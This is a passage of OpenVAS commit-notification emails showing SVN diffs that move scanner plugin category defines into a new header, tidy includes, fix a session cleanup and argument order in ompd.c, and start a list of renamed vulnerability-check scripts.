+++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -29,6 +29,8 @@ #include +#include "libopenvas.h" + #include "log.h" #include "ntp.h" #include "auth.h" From scm-commit at wald.intevation.org Mon Oct 5 11:25:54 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:25:54 +0200 (CEST) Subject: [Openvas-commits] r5365 - in trunk/openvas-libraries: . include nasl Message-ID: <20091005092554.32D50861EAAC@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:25:52 +0200 (Mon, 05 Oct 2009) New Revision: 5365 Added: trunk/openvas-libraries/include/nvt_categories.h Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/Makefile trunk/openvas-libraries/include/libopenvas.h trunk/openvas-libraries/nasl/nasl_init.c Log: * includes/nvt_categories.h: New file, contains categories previously declared in libopenvas.h and a todo. * Makefile: Install nvt_categories.h * include/libopenvas.h: Removed definitions now contained in nvti_categories (ACT_*) and in openvas-scanner/pluginscheduler.h (LAUNCH_*). * nasl/nasl_init.c: Include nvt_categories instead of libopenvas. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/ChangeLog 2009-10-05 09:25:52 UTC (rev 5365) @@ -1,3 +1,16 @@ +2009-10-05 Felix Wolfsteller + + * includes/nvt_categories.h: New file, contains categories previously + declared in libopenvas.h and a todo. + + * Makefile: Install nvt_categories.h + + * include/libopenvas.h: Removed definitions now contained in + nvti_categories (ACT_*) and in openvas-scanner/pluginscheduler.h + (LAUNCH_*). + + * nasl/nasl_init.c: Include nvt_categories instead of libopenvas. + 2009-10-03 Matthew Mundell * omp.c (omp_get_preferences_503): New function. Modified: trunk/openvas-libraries/Makefile =================================================================== --- trunk/openvas-libraries/Makefile 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/Makefile 2009-10-05 09:25:52 UTC (rev 5365) @@ -54,6 +54,7 @@ cd omp && ${MAKE} install $(INSTALL) -m 0444 include/libopenvas.h $(DESTDIR)${includedir}/openvas + $(INSTALL) -m 0444 include/nvt_categories.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/libvers.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/arglists.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/bpf_share.h $(DESTDIR)${includedir}/openvas Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:25:52 UTC (rev 5365) @@ -110,32 +110,4 @@ */ #include -/** - * 'Categories', influence execution order of NVTs. - */ - -/** Last plugins actions type. */ -#define ACT_LAST ACT_END -/** First plugins actions type. */ -#define ACT_FIRST ACT_INIT - -#define ACT_END 10 -#define ACT_FLOOD 9 -#define ACT_KILL_HOST 8 -#define ACT_DENIAL 7 -#define ACT_DESTRUCTIVE_ATTACK 6 -#define ACT_MIXED_ATTACK 5 -#define ACT_ATTACK 4 -#define ACT_GATHER_INFO 3 -#define ACT_SETTINGS 2 -#define ACT_SCANNER 1 -#define ACT_INIT 0 - -/** - * States of scheduler_plugin. - */ -#define LAUNCH_DISABLED 0 -#define LAUNCH_RUN 1 -#define LAUNCH_SILENT 2 - #endif /* _LIBOPENVAS_H */ Added: trunk/openvas-libraries/include/nvt_categories.h =================================================================== --- trunk/openvas-libraries/include/nvt_categories.h 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/include/nvt_categories.h 2009-10-05 09:25:52 UTC (rev 5365) @@ -0,0 +1,59 @@ +/* OpenVAS + * $Id$ + * Description: Category (ACT_*) definitions. + * + * Authors: + * Renaud Deraison (Original pre-fork development) + * + * Copyright: + * Based on work Copyright (C) 1998 - 2007 Tenable Network Security, Inc. + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Library General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Library General Public License for more details. + * + * You should have received a copy of the GNU Library General Public + * License along with this library; if not, write to the Free + * Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. + */ + +/** + * @file + * This file contains defines for the categories of NVTs. + * Categories influence the execution order of NVTs (e.g. NVTs with category + * ACT_SCANNER are in principle executed first). + */ + +#ifndef _NVT_CATEGORIES_H +#define _NVT_CATEGORIES_H + +/** + * @brief NVT 'Categories', influence execution order of NVTs. + * + * @todo Consider creation of an enumeration. + */ + +/** Last plugins actions type. */ +#define ACT_LAST ACT_END +/** First plugins actions type. */ +#define ACT_FIRST ACT_INIT + +#define ACT_END 10 +#define ACT_FLOOD 9 +#define ACT_KILL_HOST 8 +#define ACT_DENIAL 7 +#define ACT_DESTRUCTIVE_ATTACK 6 +#define ACT_MIXED_ATTACK 5 +#define ACT_ATTACK 4 +#define ACT_GATHER_INFO 3 +#define ACT_SETTINGS 2 +#define ACT_SCANNER 1 +#define ACT_INIT 0 + +#endif /* _NVT_CATEGORIES_H */ Modified: trunk/openvas-libraries/nasl/nasl_init.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_init.c 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/nasl/nasl_init.c 2009-10-05 09:25:52 UTC (rev 5365) @@ -20,7 +20,7 @@ #include /* for memset */ -#include "libopenvas.h" /* for ACT_INIT */ +#include "nvt_categories.h" /* for ACT_INIT */ #include "plugutils.h" /* for OPENVAS_ENCAPS_IP */ #include "nasl_tcp.h" From scm-commit at wald.intevation.org Mon Oct 5 11:29:31 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:29:31 +0200 (CEST) Subject: [Openvas-commits] r5366 - in trunk/openvas-scanner: . openvassd Message-ID: <20091005092931.EF731861EAAC@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:29:31 +0200 (Mon, 05 Oct 2009) New Revision: 5366 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/oval_plugins.c trunk/openvas-scanner/openvassd/plugs_hash.c Log: * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. * ChangeLog: Corrected. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:29:31 UTC (rev 5366) @@ -1,12 +1,19 @@ 2009-10-05 Felix Wolfsteller + * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. + + * ChangeLog: Corrected. + +2009-10-05 Felix Wolfsteller + Towards removal of libopenvas.h. * openvassd/attack.c (attack_network): Removed unused variable. * cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, - cnvts/synscan/synscan.c: Cleaned up/added includes. + cnvts/synscan/synscan.c, openvassd/save_kb.c, openvassd/save_tests.c: + Cleaned up/added includes. * include/includes.h: Removed include of libopenvas.h and ntp.h. Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:29:31 UTC (rev 5366) @@ -33,6 +33,7 @@ #include "libopenvas.h" +#include /* for ACT_END */ #include #include Modified: trunk/openvas-scanner/openvassd/plugs_hash.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 09:29:31 UTC (rev 5366) @@ -31,6 +31,7 @@ #include #include /* for auth_printf */ +#include /* for plug_get_path */ #include /* for send_fd */ #include /* for efree */ From scm-commit at wald.intevation.org Mon Oct 5 11:38:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:38:34 +0200 (CEST) Subject: [Openvas-commits] r5367 - in trunk/openvas-libraries: . include Message-ID: <20091005093834.8F70A865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:38:33 +0200 (Mon, 05 Oct 2009) New Revision: 5367 Modified: trunk/openvas-libraries/MANIFEST trunk/openvas-libraries/include/libopenvas.h Log: * include/libopenvas.h: Removed not needed function declarations and includes. * MANIFEST: Updated. Modified: trunk/openvas-libraries/MANIFEST =================================================================== --- trunk/openvas-libraries/MANIFEST 2009-10-05 09:29:31 UTC (rev 5366) +++ trunk/openvas-libraries/MANIFEST 2009-10-05 09:38:33 UTC (rev 5367) @@ -49,6 +49,7 @@ include/includes.h include/libopenvas.h include/libvers.h.in +include/nvt_categories.h INSTALL_README install-sh libopenvas.pc.in Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:29:31 UTC (rev 5366) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:38:33 UTC (rev 5367) @@ -69,34 +69,7 @@ */ typedef int(*plugin_run_t)(struct arglist *); -/* - * Network-related functions - */ -/* Plugin specific network functions */ - -int ping_host(struct in_addr); - - -void plug_set_see_also(struct arglist *, char *); -struct arglist * plug_get_see_also(struct arglist *); - - -void plug_add_dep(struct arglist *, char *, char *); - -void plug_add_port(struct arglist *, int); - -/* returns a full duplex data file stream */ -FILE * ptyexecvp (const char *file, const char **argv, pid_t *child); - -void (*pty_logger(void(*)(const char *, ...)))(const char *, ...); - -/* - * Miscellaneous functions - */ - -char * plug_get_host_name(struct arglist *); - /* Plugin preference types (influence gui in client) */ #define PREF_CHECKBOX "checkbox" #define PREF_ENTRY "entry" @@ -105,9 +78,4 @@ #define PREF_FILE "file" /*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ -/* - * Pcap utils - */ -#include - #endif /* _LIBOPENVAS_H */ From scm-commit at wald.intevation.org Mon Oct 5 11:45:25 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:45:25 +0200 (CEST) Subject: [Openvas-commits] r5368 - in trunk/openvas-scanner: . cnvts/synscan openvassd Message-ID: <20091005094525.AF6AA865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:45:25 +0200 (Mon, 05 Oct 2009) New Revision: 5368 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/synscan/synscan.c trunk/openvas-scanner/openvassd/nasl_plugins.c trunk/openvas-scanner/openvassd/save_tests.c Log: * cnvts/synscan/synscan.c, openvassd/save_tests.c, openvassd/nasl_plugins.c: Added missing includes. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:45:25 UTC (rev 5368) @@ -1,5 +1,10 @@ 2009-10-05 Felix Wolfsteller + * cnvts/synscan/synscan.c, openvassd/save_tests.c, + openvassd/nasl_plugins.c: Added missing includes. + +2009-10-05 Felix Wolfsteller + * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. * ChangeLog: Corrected. Modified: trunk/openvas-scanner/cnvts/synscan/synscan.c =================================================================== --- trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -8,6 +8,7 @@ #include /* for ACT_SCANNER */ #include /* for get_datalink_size */ #include /* for scanner_add_port */ +#include /* for getpts */ #include /* for efree */ Modified: trunk/openvas-scanner/openvassd/nasl_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -45,6 +45,7 @@ #include "plugs_hash.h" #include "preferences.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ #include "log.h" /** Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -29,6 +29,7 @@ #include +#include /* for auth_printf */ #include /* for emalloc */ #include From scm-commit at wald.intevation.org Mon Oct 5 12:23:52 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:23:52 +0200 (CEST) Subject: [Openvas-commits] r5369 - in trunk/openvas-libraries: . include Message-ID: <20091005102352.574A5865F477@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 12:23:51 +0200 (Mon, 05 Oct 2009) New Revision: 5369 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/Makefile trunk/openvas-libraries/include/libopenvas.h Log: * include/libopenvas.h: Emptied, except for documentation. * Makefile: Do not install libopenvas.h anymore. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/ChangeLog 2009-10-05 10:23:51 UTC (rev 5369) @@ -1,5 +1,18 @@ 2009-10-05 Felix Wolfsteller + * include/libopenvas.h: Emptied, except for documentation. + + * Makefile: Do not install libopenvas.h anymore. + +2009-10-05 Felix Wolfsteller + + * include/libopenvas.h: Removed not needed function declarations and + includes. + + * MANIFEST: Updated. + +2009-10-05 Felix Wolfsteller + * includes/nvt_categories.h: New file, contains categories previously declared in libopenvas.h and a todo. Modified: trunk/openvas-libraries/Makefile =================================================================== --- trunk/openvas-libraries/Makefile 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/Makefile 2009-10-05 10:23:51 UTC (rev 5369) @@ -53,7 +53,6 @@ cd nasl && ${MAKE} install cd omp && ${MAKE} install - $(INSTALL) -m 0444 include/libopenvas.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/nvt_categories.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/libvers.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/arglists.h $(DESTDIR)${includedir}/openvas Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 10:23:51 UTC (rev 5369) @@ -32,50 +32,3 @@ * \section copying License Information * \verbinclude COPYING */ - -#ifndef _LIBOPENVAS_H -#define _LIBOPENVAS_H - -#ifndef ExtFunc -#define ExtFunc -#endif - - -#include "arglists.h" -#include "bpf_share.h" -#include "ftp_funcs.h" -#include "kb.h" -#include "network.h" -#include "pcap_openvas.h" -#include "plugutils.h" -#include "popen.h" -#include "proctitle.h" -#include "rand.h" -#include "resolve.h" -#include "scanners_utils.h" -#include "services1.h" -#include "share_fd.h" -#include "store.h" -#include "system.h" -#include "www_funcs.h" - - -/** - * Plugin standard function template to init a plugin (nasl/nes/oval). - */ -typedef int(*plugin_init_t)(struct arglist *); -/** - * Plugin standard function template to run a plugin (nasl/nes/oval). - */ -typedef int(*plugin_run_t)(struct arglist *); - - -/* Plugin preference types (influence gui in client) */ -#define PREF_CHECKBOX "checkbox" -#define PREF_ENTRY "entry" -#define PREF_RADIO "radio" -#define PREF_PASSWORD "password" -#define PREF_FILE "file" -/*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ - -#endif /* _LIBOPENVAS_H */ From scm-commit at wald.intevation.org Mon Oct 5 12:27:25 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:27:25 +0200 (CEST) Subject: [Openvas-commits] r5370 - in trunk/openvas-scanner: . cnvts/find_service openvassd Message-ID: <20091005102725.54B52865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 12:27:24 +0200 (Mon, 05 Oct 2009) New Revision: 5370 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/find_service/find_service.c trunk/openvas-scanner/openvassd/nes_plugins.c trunk/openvas-scanner/openvassd/openvassd.c trunk/openvas-scanner/openvassd/oval_plugins.c trunk/openvas-scanner/openvassd/pluginload.h trunk/openvas-scanner/openvassd/utils.c Log: Removed dependence on libopenvas.h. * cnvts/find_service/find_service.c: Added includes and defines that previously were in libopenvas.h. * openvassd/pluginload.h: Added function typedefs that were previously in libopenvas.h. * openvassd/nes_plugins.c, openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: Removed libopenvas-include, added missing includes. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 10:27:24 UTC (rev 5370) @@ -1,5 +1,19 @@ 2009-10-05 Felix Wolfsteller + Removed dependence on libopenvas.h. + + * cnvts/find_service/find_service.c: Added includes and defines that + previously were in libopenvas.h. + + * openvassd/pluginload.h: Added function typedefs that were previously + in libopenvas.h. + + * openvassd/nes_plugins.c, openvassd/openvassd.c, + openvassd/oval_plugins.c, openvassd/utils.c: Removed libopenvas-include, + added missing includes. + +2009-10-05 Felix Wolfsteller + * cnvts/synscan/synscan.c, openvassd/save_tests.c, openvassd/nasl_plugins.c: Added missing includes. Modified: trunk/openvas-scanner/cnvts/find_service/find_service.c =================================================================== --- trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -9,11 +9,12 @@ #include -#include "libopenvas.h" - #include /* for struct arglist */ +#include /* for plug_get_oldstyle_kb */ +#include /* for get_encaps_through */ #include /* for ACT_SCANNER */ #include /* for OPENVAS_ENCAPS_IP */ +#include /* for efree */ #include @@ -48,6 +49,13 @@ #define NUM_CHILDREN "Number of connections done in parallel : " +/* Plugin preference types (influence gui in client) */ +#define PREF_CHECKBOX "checkbox" +#define PREF_ENTRY "entry" +#define PREF_RADIO "radio" +#define PREF_PASSWORD "password" +#define PREF_FILE "file" +/*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ int plugin_init(desc) Modified: trunk/openvas-scanner/openvassd/nes_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -29,14 +29,18 @@ #include -#include "libopenvas.h" - #include +#include /* for internal_send */ +#include /* for plug_set_path */ +#include /* for store_load_plugin */ +#include /* for emalloc */ + #include "pluginload.h" #include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ #include "log.h" #include "preferences.h" Modified: trunk/openvas-scanner/openvassd/openvassd.c =================================================================== --- trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -43,10 +43,16 @@ #include +#include /* for bpf_server */ #include +#include /* for auth_printf */ #include +#include /* for find_in_path */ +#include /* for store_init */ +#include /* for estrdup */ +#include /* for openvas_init_random */ -#include "libopenvas.h" +#include "proctitle.h" /* for setproctitle.h */ #ifdef USE_LIBWRAP #include Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -31,10 +31,12 @@ #include -#include "libopenvas.h" - +#include +#include /* for internal_send */ #include /* for ACT_END */ -#include +#include /* for plug_set_oid */ +#include /* for store_load_plugin */ +#include /* for emalloc */ #include #include @@ -43,6 +45,7 @@ #include "pluginload.h" #include "preferences.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ static void oval_thread (struct arglist *); Modified: trunk/openvas-scanner/openvassd/pluginload.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 10:27:24 UTC (rev 5370) @@ -42,7 +42,18 @@ void plugin_free(struct arglist *); void plugins_free(struct arglist *); + /** + * Plugin standard function template to init a plugin (nasl/nes/oval). + */ +typedef int(*plugin_init_t)(struct arglist *); +/** + * Plugin standard function template to run a plugin (nasl/nes/oval). + */ +typedef int(*plugin_run_t)(struct arglist *); + + +/** * Class of a NVT (implemented as list). * Currently three classes do exist: nes_plugin_class, nasl_plugin_class and * oval_plugin_class. Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -29,7 +29,9 @@ #include -#include "libopenvas.h" +#include /* for stream_zero */ +#include /* for plug_get_launch */ +#include /* for emalloc */ #include "log.h" #include "ntp.h" From scm-commit at wald.intevation.org Mon Oct 5 12:31:15 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:31:15 +0200 (CEST) Subject: [Openvas-commits] r5371 - in trunk/openvas-manager: . src Message-ID: <20091005103115.8E3E3865F49C@pyrosoma.intevation.org> Author: mattm Date: 2009-10-05 12:31:15 +0200 (Mon, 05 Oct 2009) New Revision: 5371 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/ompd.c Log: * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. (serve_omp): Put the credential args the right way round. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-05 10:27:24 UTC (rev 5370) +++ trunk/openvas-manager/ChangeLog 2009-10-05 10:31:15 UTC (rev 5371) @@ -1,5 +1,10 @@ -2009-09-30 Matthew Mundell +2009-10-05 Matthew Mundell + * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. + (serve_omp): Put the credential args the right way round. + +2009-10-03 Matthew Mundell + When parsing the OTP PREFERENCES, read in all the preferences before enabling them, otherwise OMP GET_PREFERENCES might return a partial set of preferences. Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-05 10:27:24 UTC (rev 5370) +++ trunk/openvas-manager/src/ompd.c 2009-10-05 10:31:15 UTC (rev 5371) @@ -449,6 +449,9 @@ g_warning ("%s: failed to set scanner socket flag: %s\n", __FUNCTION__, strerror (errno)); + openvas_server_free (server_socket, + *server_session, + *server_credentials); return -1; } return server_socket; @@ -490,8 +493,8 @@ int serve_omp (gnutls_session_t* client_session, gnutls_session_t* scanner_session, + gnutls_certificate_credentials_t* client_credentials, gnutls_certificate_credentials_t* scanner_credentials, - gnutls_certificate_credentials_t* client_credentials, int client_socket, int* scanner_socket_addr) { int nfds, ret; From scm-commit at wald.intevation.org Mon Oct 5 12:46:57 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:46:57 +0200 (CEST) Subject: [Openvas-commits] r5372 - in trunk/openvas-plugins: . scripts Message-ID: <20091005104657.6917785C731B@pyrosoma.intevation.org> Author: chandra Date: 2009-10-05 12:46:42 +0200 (Mon, 05 Oct 2009) New Revision: 5372 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/3com_switches.nasl trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl trunk/openvas-plugins/scripts/apache_conn_block.nasl trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl trunk/openvas-plugins/scripts/apache_server_info.nasl trunk/openvas-plugins/scripts/apache_server_status.nasl trunk/openvas-plugins/scripts/avaya_switches.nasl trunk/openvas-plugins/scripts/aventail_asap.nasl trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl trunk/openvas-plugins/scripts/defaultnavcheck.nasl trunk/openvas-plugins/scripts/fortigate_detect.nasl trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl trunk/openvas-plugins/scripts/ident_process_owner.nasl trunk/openvas-plugins/scripts/imss_detect.nasl trunk/openvas-plugins/scripts/iss_deploymanager.nasl trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl trunk/openvas-plugins/scripts/nortel_default_username_password.nasl trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl trunk/openvas-plugins/scripts/notesinicheck.nasl trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl trunk/openvas-plugins/scripts/qpopper2.nasl trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl trunk/openvas-plugins/scripts/websense_detect.nasl trunk/openvas-plugins/scripts/webshield_detect.nasl trunk/openvas-plugins/scripts/zyxel_pwd.nasl Log: Updated script family as per CR #23 Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 10:46:42 UTC (rev 5372) @@ -1,5 +1,69 @@ 2009-10-05 Chandrashekhar B + * scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl, + scripts/fortigate_detect.nasl, + scripts/notesinicheck.nasl, + scripts/gb_vmware_prdts_prv_esc_vuln.nasl, + scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl, + scripts/checkpoint_secureplatform.nasl, + scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl, + scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl, + scripts/secpod_python_mult_vuln_win_900105.nasl, + scripts/zyxel_pwd.nasl, + scripts/smc2804wbr_default_password.nasl, + scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl, + scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl, + scripts/avaya_switches.nasl, + scripts/3com_switches.nasl, + scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl, + scripts/defaultnavcheck.nasl, + scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl, + scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl, + scripts/icecast_avllib_bof.nasl, + scripts/apache_server_info.nasl, + 